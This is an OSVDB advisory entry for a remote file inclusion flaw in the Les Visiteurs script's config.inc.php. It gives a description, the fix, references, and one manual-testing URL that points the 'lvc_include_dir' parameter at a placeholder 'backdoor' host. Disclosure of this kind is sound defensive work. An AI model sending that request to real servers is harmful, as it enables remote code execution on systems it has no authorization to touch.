Les Visiteurs config.inc.php Arbitrary File Inclusion

2003-10-25T00:00:00
ID OSVDB:3586
Type osvdb
Reporter OSVDB
Modified 2003-10-25T00:00:00

Description

Vulnerability Description

Les Visiteurs contains a flaw that allows a remote attacker to include arbitrary files when requesting "config.inc.php". The issue is due to the "lvc_include_dir" parameter not sanitizing input which allows the attacker to specify arbitrary configuration files on a remote untrusted machine. Such a configuration file could be created to include arbitrary commands and options which will be read and acted upon on the vulnerable machine.

Solution Description

Upgrade to version 2.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Les Visiteurs contains a flaw that allows a remote attacker to include arbitrary files when requesting "config.inc.php". The issue is due to the "lvc_include_dir" parameter not sanitizing input which allows the attacker to specify arbitrary configuration files on a remote untrusted machine. Such a configuration file could be created to include arbitrary commands and options which will be read and acted upon on the vulnerable machine.

Manual Testing Notes

http://[victim]/include/config.inc.php?lvc_include_dir=http://backdoor/

References:

Vendor URL: http://chezwam.net/main/publications/lesvisiteurs/ Secunia Advisory ID:10079 Related OSVDB ID: 2717 Other Advisory URL: http://www.securityspace.com/smysecure/catid.html?id=11911 Nessus Plugin ID:11911 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0262.html Bugtraq ID: 8902